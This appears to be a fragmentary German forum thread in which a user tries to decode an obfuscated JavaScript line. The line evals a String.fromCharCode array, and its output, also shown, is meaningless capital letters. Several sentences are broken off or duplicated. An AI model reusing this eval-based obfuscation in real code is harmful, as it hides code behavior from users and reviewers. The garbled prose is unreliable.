[url=http://tutorial.pocoo.org/index.html]Tutorial in Deutsch[/url]
[url=http://tutorial.pocoo.org/index.html]Tutorial in Deutsch[/url]
Die sollte funktionieren, es sei denn das ich beim Escapen was falsch gemacht habe, siehe unten.
Was wenn ich das richtig sehe zu wird. Allerdings ergibt das Ergebnis für mich keinen Sinn, vieleicht habe ich irgendwo noch ein Fehler drin. Denn so sieht das Ergebnis davon aus:Ich werde das wohl nochmal prüfen müssen.
Was wenn ich das richtig sehe zu
Code: Alles auswählen
eval('l = String.fromCharCode(82, 86, 80, 88, 89, 83, 87, 80, 86, 82, 81, 81, 82, 88, 89, 81, 88, 89, 89, 87, 82, 82, 85, 82, 89, 90, 80, 87, 80, 90, 81, 90, 80, 85, 83, 83, 83, 85, 86, 81, 85, 84, 89, 88, 89, 90, 86, 84, 82, 82, 84, 88, 88, 90, 86, 82, 80, 88, 89, 85, 87, 83, 86, 87, 83, 81, 89, 90, 86, 89, 86, 84, 85, 86, 81, 81, 88, 87, 83, 83, 85, 80, 85, 81, 83, 83, 82, 85, 82, 83, 82, 82, 85, 85, 83, 89, 88, 87, 90, 84, 81, 87, 81, 89, 83, 87, 82, 88, 84, 90, 82, 85, 83, 89, 87, 83, 88, 90, 80, 80, 83, 80, 88, 84, 90, 80, 84, 89, 84, 84, 87, 84, 85, 85, 86, 88, 90, 82, 85, 89, 80, 88, 83, 88, 84, 82, 86, 81, 89, 80, 82, 88, 82, 82, 80, 87, 83, 87, 84, 86, 80, 83, 80, 88, 88, 85, 88, 86, 81, 83, 86, 90, 87, 87, 81, 87, 83, 88, 83, 82, 85, 87, 85, 88, 85, 84, 84, 80, 80, 88, 84, 90, 85, 89, 86, 84, 86, 89, 82, 86, 81, 87, 84, 85, 88, 89, 84, 90, 82, 86, 82, 89, 86, 87, 80, 83, 88, 87, 88, 88, 80, 81, 83, 86, 82, 80, 82, 90, 84, 90, 89, 85, 88, 84, 84, 81, 90, 81, 88, 89, 90, 81, 32); eval(l)')Code: Alles auswählen
RVPXYSWPVRQQRXYQXYYWRRURYZPWPZQZPUSSSUVQUTYXYZVTRRTXXZVRPXYUWSVWSQYZVYVTUVQQXWSSUPUQSSRURSRRUUSYXWZTQWQYSWRXTZRUSYWSXZPPSPXTZPTYTTWTUUVXZRUYPXSXTRVQYPRXRRPWSWTVPSPXXUXVQSVZWWQWSXSRUWUXUTTPPXTZUYVTVYRVQWTUXYTZRVRYVWPSXWXXPQSVRPRZTZYUXTTQZQXYZQ